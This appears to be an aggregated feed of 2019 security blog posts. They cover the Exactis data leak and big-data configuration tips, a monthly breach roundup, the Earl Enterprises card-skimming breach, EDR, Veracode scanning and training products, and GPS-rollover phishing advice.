It was June of last year that the Exactis leak was revealed. Exactis, a Floridian marketing data broker, had a misconfigured Amazon ElasticSearch server that exposed close to 340 million records on both American adults and businesses. This included incredibly specific details such as pets, gender of children, and smoking habits. This leak has crippled Exactis; there is little chance that Exactis will bounce back from this event.  Beyond the effect that this leak has had on the business, Exactis CEO, Steve Hardigree, has also been open about the stream of inquiries, threats, and constant stress this has had on his personal life.

The root of this crippling leak lies in a misconfiguration and shows us just how configurations can make or break your business.  When you are planning out your big data space, you need to double, and triple check your configurations.

Tips for Checking your Configurations:

  • Security is a multi-layered beast and your data is unique, which in turn means that your approach to security must be customized. This could mean using security software in an unconventional manner or utilizing a third-party security company.
  • Think of the little things. Do you trust all of the programming interacting with your data? If not, how can you make it a trusted resource?
  • Consider getting a third-party Network Security & Architecture Review of your environment. This allows you to have an outside opinion of exactly how secure your data is. If possible, it is beneficial to get this review at least annually.

2.  Access Granted

As you are deciding on configurations, you need to take into account who will be granted access and to what.

If the data is meant to stay completely internal, you need to decide what kinds of users are allowed what permissions. For example, who is allowed to pull data? Is anyone? If it’s not a part of the daily workload, under what circumstances is it allowed? By who?

If you are going to share your data with third parties, there is another host of questions to consider.  Do you allow them unlimited access to your data? Who do you allow access to?

Tips for Granting Internal & External Access:

  • Limit the amount of external access you allow; if possible, do not allow it at all. This will lessen your attack surface and your inherent risk.
  • External resources likely don’t need to access everything your internal resources can. Restrictive groups are a great organizational way to separate who has access to what within your environment.
  • Not all internal resources are equal and therefore should not be given the same access. You will need to evaluate how you give out access and document your process of escalating and deescalating access.

As it has become evident with Facebook’s admittance of leaving data connections open even after deals had been closed, it is also important to think about what happens when access has been revoked. What are you going to put in place to prevent access when it should no longer be allowed?

Take the access you grant seriously so you don’t end up scrambling to make changes after an incident.

3.  Monitoring & Alerting

For everything that can be done to your data, there should be a way for you to monitor it. That is not to say that you have to micro-manage every aspect of your big data. But if an incident were to occur, or more realistically when an incident occurs, you should be able to construct an image of what was going on at the time of the event. For this to be possible, you need a way to monitor your data and receive alerts on the incidents.

Tips for Monitoring & Alerting:

  • Adversaries do not keep normal business hours, so be sure you are monitoring your data at all hours. One way to easily achieve 24/7/365 monitoring is by outsourcing this function to a Managed Security Services Provider (MSSP).
  • When setting up alerts, it can be challenging to find a balance between “alert on every single possible event” and “I only want to see important alerts”. What if an uptick on those seemingly harmless alerts is the only tip-off to an insider threat? And on the other hand, if you are constantly on edge from alerts, you will easily fall into alert fatigue. An MSSP can act as the filter between you and your alerts, only notifying you after an alert is investigated and confirmed to be legitimate.

When you are in possession of big data, there is a lot on the line to secure.  When a breach of this magnitude can destroy your business, it’s critical you take into consideration these factors.

The post 3 Factors to Consider When Securing Big Data appeared first on GRA Quantum.

Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank provided 'Heimdal Thor', security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote injection commands at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups.
 
Facebook made negative security headlines yet against after they disclosed that 20,000 of their employees had access to hundreds of millions of their user account passwords for years.

One of the world’s biggest aluminium producers, 
Norsk Hydrosuffered production outages after a ransomware outbreak impacted its European and US operations.  Damages from ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach, “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”.  According to security firm Resecurity, the attacks were perpetrated by Iranian-linked group known as IRIDIUM.

Credit monitoring Equifax admitted in a report it didn't follow its own patching schedule, neglecting to patch Apache Struts which led to a major 2017 breach which impacted 145 million people.  The report also said Equifax delayed alerting their customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.
BLOG
NEWS

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Why Traditional EDR Doesn’t Solve Today’s Modern Threats

Today’s cyberattacks are more advanced and complex than ever before. It’s no surprise that enterprises can no longer rely on traditional endpoint detection and response (EDR) solutions to protect against the evolving threat landscape. With the amount of data rapidly expanding in conjunction with an increasing number of endpoints, enterprise IT departments are facing new management and security challenges. EDR can provide businesses with another layer of threat detection in a multilayered security approach.

Cyberthreats Have Evolved, So Should Your Security

The impact of a cyberattack is no longer siloed to one employee’s device. It has the ability, speed, and scope to impact your entire business in mere seconds. And it’s hard not to think of cybersecurity as being the never-ending game of cat-and-mouse, with cybercriminals constantly developing new skills, updating code, and deploying new tactics to get inside your endpoints. But instead of your organization trying to play catch up, get ahead of malicious actors by developing a comprehensive security strategy to prevent attacks before they happen.

Many cyberthreats use multiple attack mechanisms, which means just one form of security is no longer enough to keep your entire enterprise secure from malicious actors. And although some anti-virus software can’t keep up with new malware or variants of known malware, it still plays an important role in a multilayered approach for a robust cybersecurity strategy. Endpoint detection and response is also essential when developing a comprehensive security approach. It offers a threat detection capability, allowing your next-generation solution to track down potential threats if they break through the first layer of your digital perimeter.

The Importance of EDR

The SANS Endpoint Protection and Response Survey reports that 44% of IT teams manage between 5,000 and 500,000 endpoints across its network. Each of these endpoints become an open door for a potential cyberattack. Given the increasing number of endpoints, organizations are beginning to understand that they’re more susceptible to breaches and are willing to adopt a multilayered security approach to prevent as many attacks as possible.

With endpoint detection and response, organizations have granular control and visibility into their endpoints to detect suspicious activity. There are new features and services for EDR, expanding its ability to detect and investigate threats. An EDR solution can discover and block threats in the pre-execution stage, investigate threats through analytics, and help provide an incident response plan. Additionally, some EDR solutions can leverage AI and machine learning to automate the steps in an investigative process. These new capabilities can learn an organization’s baseline behaviors and use this information, along with a variety of other threat intelligence sources, to interpret findings.

Incorporating EDR Into Your Security Strategy

The adoption of EDR is projected to increase significantly over the next few years. According to Stratistics MRC’s Endpoint Detection and Response – Global Market Outlook (2017-2026), sales of EDR solutions—both on-premises and cloud-based—are expected to reach $7.27 million by 2026, with an annual growth rate of nearly 26%.

When adopting EDR into your security portfolio, the application should have three basic components: endpoint data collection agents, automated response, and analysis and forensics. McAfee MVISION Endpoint Detection and Response (EDR) helps you get ahead of modern threats with AI-guided investigations that surface relevant risks and automate and remove the manual labor of gathering and analyzing evidence.

For more information on endpoint detection and response, check out our Security Awareness page and the McAfee Endpoint Security portfolio of products.

The post Why Traditional EDR Doesn’t Solve Today’s Modern Threats appeared first on McAfee Blogs.

ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty

In this episode, we’ll hear from Wayne Anderson, Enterprise Security Architect at McAfee and Dan Flaherty from the cloud security product team speak on a wide range of topics from upcoming technology trends in the market, to adversarial machine learning, cloud models for security, and a look back at the RSA conference.

The post ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty appeared first on McAfee Blogs.

Veracode Dynamic Analysis: Reduce the Risk of a Breach

This blog post has been updated as of April 2, 2019

Veracode Dynamic Analysis is a dynamic scanning solution that features automation, depth of coverage, and unmatched scalability. Built on microservices and cloud technologies, the Veracode Dynamic Analysis solution is available on the Veracode SaaS platform. Veracode Dynamic Analysis helps both vulnerability managers tasked with safeguarding the entire web application portfolio, and AppSec managers tasked with safeguarding critical applications in pre-production. With the frameworks developers use to build web applications changing often, and the push toward single page applications, Veracode Dynamic Analysis gives you the automated dynamic scanning you need to find vulnerabilities quickly and accurately.

Benefits of Scheduling Automation

Consistent dynamic scanning is key to keeping your web applications safe, and consistent scanning is achievable with an automated dynamic scanning solution. Imagine your CISO tells you to scan your web apps as often as feasible. Depending on remediation frequency, you come up with a quarterly, monthly, or weekly scanning schedule. To add additional complexity, IT gives you a maintenance window when dynamic scanning cannot occur. If you’re part of a global company, you also have time zones to contend with, making it virtually impossible to depend on a manual pause and resume, not to mention the inconvenience of waking up at 3:00 AM to pause a running scan. With all these variables to handle, you need a dynamic scanning solution that provides true automation to handle scheduling and IT maintenance windows, so you can “set it and forget it.” 

Recurring Scan Scheduling provides the ability to set up a schedule such that the application can be automatically scanned on a weekly, monthly, or quarterly cadence (or anything in between). Once the schedule has been set up, the dynamic scan will kick off automatically at the defined cadence. If the scan has been set up to start on a Tuesday, it will maintain that start day for the weekly scans to avoid running into weekends and holidays.

Automated Pause & Resume provides the ability to designate a maintenance window when the applications won’t be scanned. Dynamic scanning will be automatically paused when the IT maintenance window begins and automatically resume when the applications can be scanned. The pause and resume functionality has been built to ensure scanning resumes where it left off, with the goal of full coverage.

The screenshot below shows how to set up a weekly recurring scan that runs year round, pauses at midnight, and resumes at 4:00 AM each day.

  • Each week the application is dynamically scanned with the automated schedule and scan kick-off.
  • The system automatically pauses at the start of the maintenance window at 12:00 AM and resumes scanning at 4:00 AM.
  • You can adjust the duration based on the size of the application and the number of applications scanned in the batch to get the best coverage.

Authenticated Batch Scanning provides the ability to increase coverage by scanning behind the login screen, using a multitude of login mechanisms such as auto login, basic authentication, or uploading a login script. You can depend on the pre-scan feature to provide accurate feedback on the connection and authentication for the application under test, so you can fix any access issues ahead of the scheduled start time. In addition, a batch of scans can be kicked off at the same time to allow concurrent scanning with authentication. You save a lot of time when all applications can be concurrently scanned, with coverage for single page applications, modern frameworks such as Angular and ReactJS, and the ability to cover large web applications quickly.

Dynamic Analysis makes it easy to onboard applications and provides multiple input mechanisms. Uploading a CSV file is a quick way for large and small companies to take advantage of scanning applications concurrently.

Internal Scanning Management with Veracode Dynamic Analysis

There are many reasons for an application to live behind a firewall, beyond that it still in the development process waiting for test and quality assurance checks. Some applications are used for more sensitive financial operations and HR purposes, while others are used in highly regulated industries like healthcare and financial services. Even more simply, organizations use many applications internally and there is no reason for them to expose them externally. Historically, the enduser has had to install a Virtual Scan Appliance within their environment and send scan data through an insecure midpoint so the vendor can actually receive the data and return results.

Our Internal Scanning Management Feature takes a fresh approach to this challenge by offering a completely new, IT-compliant way to access these behind-the-firewall applications. Rather than using a Virtual Scan Appliance, or an on premise scanner that is difficult to maintain and does not scale, the Veracode Dynamic Analysis scanner continues to run in the cloud and uses the Secure Scanning Gateway. This gateway connection is completely controlled by the enduser. You can open the connection to scan your applications behind the firewall – and close the gateway whenever you’d like. This empowers you to not only scan applications that live behind the firewall, but to apply dynamic testing to applications in the Staging environment before they are pushed into production. Below is a screenshot with a gateway and endpoint from the Veracode Platform.

 

Show Me the Results: Consolidated View

Veracode Dynamic Analysis provides visibility into the scanning process to give you peace of mind and comprehensive results once the scanning is complete. The Veracode Platform’s Triage Flaw Viewer provides CWE details, vulnerability severity, along with request/response. In addition, the Platform provides reports to show scan coverage, summary reports for executives, and detailed reports for AppSec teams.

The goal of dynamic scanning is to find exploitable vulnerabilities at runtime, and remediate the issues found. The Dynamic Flaw Inventory provides a dashboard that provides historical vulnerability information, allowing AppSec managers to track team progress toward fixing vulnerabilities. 

Veracode Dynamic Analysis gives you a solution to scan your entire portfolio of web applications with ease, provides accurate results, and puts you on the path to remediate the findings. Even if you are running static scans early in the SDLC, dynamically scanning your web application at runtime uncovers exploitable vulnerabilities that static scans won’t find. Use our dynamic scanning solution to find and remediate flaws before a hacker exploits the vulnerability, resulting in a breach.

I’d love to hear your feedback

Would Veracode Dynamic Analysis benefit your AppSec program and reduce the risk of a breach? I’d like to hear your thoughts. To learn more please download our whitepaper, "Reducing Your Risk of a Breach with Dynamic Analysis," or to schedule a demo now, click here.

How Many Web Applications Does Your Organization Have? It’s More Than You Think

“Automation has saved a tremendous amount of time. We went from a day per app to review and now we are essentially reviewing through automation 18,000 scans a day with only 20 AppSec engineers. You do the math — 18,000 deploys a day with 20 engineers — you can’t scale that manually.”

Senior manager application and cloud security, insurance, The Total Economic ImpactTM of the Veracode Application Security Platform Study

One of the things we pride ourselves on here at Veracode is offering solutions and services that help add a little bit more ease to the application security process. We talk a lot about shifting left, and we do our best to put our money where our mouths are by creating a variety of integrations and automations that empower development teams to adopt a security-first mindset without sacrificing speed or agility. Yet there is more to a complete and holistic application security program than scanning in the CI/CD or making sure you’re securing open source components.

What about all of the web applications that you don’t know or simply forgot about? What about the exploitable vulnerabilities that can only be found at runtime? Or the applications that contain sensitive data and live behind the firewall? In order to ensure the security of these applications – and to make sure you have a proper inventory – you need to conduct discovery and dynamic scans.

What Do You Mean Web Applications I Don’t Know About or Forgot?

It’s more common that you would imagine that organizations and brands have more web apps than they realize – at Veracode, we help our clients create comprehensive application inventories, and find that they are, on average, comprised of roughly 30 percent more applications than clients knew about. For example, in M&A activity, more than just a company or brand is acquired – you also acquire their web assets. Further, the digital landscape is decorated with marketing promotional sites meant to attract attention.

Paul Farrington, Veracode CTO in EMEA, is familiar with how common it is to underestimate the extent and reach of an organization’s IT assets. In a project that Veracode conducted for a high street bank, we discovered 1,800 websites that had yet to be logged.

“Their perimeter can be 50% larger than they originally thought it was,” Farrington told the BBC.

It's impossible to secure an entire web application attack surface if you don’t know about all of your applications, and the very thing meant to draw attention to your brand and boost your bottom line is the same target attackers go after to infiltrate your organization. According to the 2018 Verizon Data Breach Investigations Report, web applications continue to be the number one vector for reported breaches. In nearly 90 percent of breaches, it took only minutes for attackers to gain access – and it took months for nearly 70 percent of organizations to detect the systems that had been compromised.

Securing ALL of Your Web Applications With Veracode Discovery + Veracode Dynamic Analysis

Without a solution to help you discover these web applications, you can never be completely certain that you have scanned all of your web applications. This is where Veracode Discovery can help.

Veracode Discovery is a threat intelligence solution that leverages IP ranges, host names, keywords, and other inputs to scan the web for every web application that may be associated with your organization. The results are uploaded to the Veracode Application Security Platform where users can sort through the findings and input them into Veracode Dynamic Analysis through an easy-to-follow workflow. This ensures that you have full visibility into what your organization owns and that you are able to either scan and remediate those applications or sunset them, which improves the organization’s overall security posture.

Veracode Dynamic Analysis is fast, but it’s not just about the speed at which a scan returns results. It’s about the complete workflow – scan start, scan complete, and through to remediation. Veracode Dynamic Analysis is fast because of scheduling automation and a single upload that allows you to batch upload multiple applications into the same analysis. As a SaaS solution, Veracode Dynamic Analysis is able to kick off a scan for hundreds of applications at the same time. Unlike other solutions on the market, Veracode Dynamic Analysis can concurrently scan both authenticated and unauthenticated applications both in front of and behind a firewall. What’s more, the results that you receive are immediately actionable: they contain less than 1 percent false positives thanks to the accuracy of our scanner and limited manual scrubbing.

Veracode Dynamic Analysis covers a wide variety of application frameworks, including Single Page Applications, JavaScript apps, HTML5, Angular, and ReactJS. This gives you the reassurance that Veracode Dynamic Analysis will be able to return results on your applications and provide you with actionable results.

To learn more about Veracode Dynamic Analysis, download our whitepaper, Reducing Your Risk of a Breach with Dynamic Analysis.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

Scan WordPress websites for vulnerabilities WPScan Kali Linux

Scan WordPress websites for vulnerabilities WPScan Kali Linux   WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian Kali Linux comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

New eLearning Learner Levels Streamline Verified Progress

Before customers buy from you, they ask “Can you prove that your application is secure, and that you will protect our data if we give it to you?” Companies around the world struggle to answer this question, especially with the advancement of DevOps and rapid changes/deployment of applications into production. As such, we launched Verified to help you prove to your customers that you adopt security best practices for your applications and the developers that support them on an ongoing basis.

Veracode Verified is a three-tier maturity program that includes several training elements. For example, to reach the Verified Team tier, one requirement is to select and train a security champion. A requirement to reach Verified Continuous is to roll out security fundamentals training to all developers working on an application. 

Veracode Introduces Learning Levels

In order to help companies track the maturity of their eLearning program and their progress toward Verified tiers, Veracode launched learning levels in the eLearning product. The new enhancement to eLearning includes the following:

Learning Levels: There are three levels that individuals can reach within the platform. Each level has a requirement in terms of specific courses a user must complete in order to obtain that level.

Level 1 – Developer Security Fundamentals

Level 2 – Verified Team Security Champion

Level 3 – Verified Continuous Security Champion

Visit our website for more details on developer training.

Platform Badges: There are now badges next to user names that align to the level the user has reached. This allows managers to quickly identify that their teams have met their policy requirements for eLearning.

Certificate: Users can also download a certificate that shows their name, the level they reached, and the date they achieved their status.

Reporting: Managers can download a report for their teams on the levels they achieved, and the date it was achieved.

A Variety of Developer Training that Meets Your Specific Needs

With the increased speed of development, plus security shifting “left,” developers need to catch security-related defects on their own as often as possible. However, most developers have had no opportunities to learn secure coding, in school or on the job. Veracode offers application security leaders the chance to engage developers with various types of training, from self-service eLearning to fully customizable on-site workshops. 

Learn more about proving the security of your development process with our Verified program, and the different training elements needed to become Verified.